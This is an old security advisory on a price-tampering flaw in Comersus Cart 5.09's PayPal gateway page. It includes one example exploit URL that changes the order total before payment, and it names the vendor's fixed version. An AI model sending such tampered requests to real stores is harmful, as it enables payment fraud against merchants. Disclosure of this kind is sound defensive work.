|
Comersus Cart Improper Request Handling Release Date: July 6, 2004 Severity: Medium Vendor: Comersus Open Technologies Software: Tested on Comersus Cart 5.09 Previous versions may also be affected. Remote: Remotely executed from any web browser Technical Details: The unethical user is able to modify the parameters to change the pricing before the order is processed through PayPal. This would allow the unethical user to place a fraudulent transaction which many times isn't caught until the product is already shipped OR the shopping cart owner is charged a chargeback fee when refunding the order. Example: http://[VICTIM]/comersus/store/comersus_gatewayPayPal.asp?idOrd er=2002&Order Total=|102|222|228|22|130|36|209&name=Thomas&lastName=Ryan&address=123+Easy+ Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D 1731&email=tommy%40providesecurity%2Ecom&orderDetails=1x+%23RDHT%2F11+Red+Ha t+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Mi llennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BPRES2%2F6+So+You+Wan t+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A Vendor Fix: Update to 5.098 http://www.comersus.com/ Use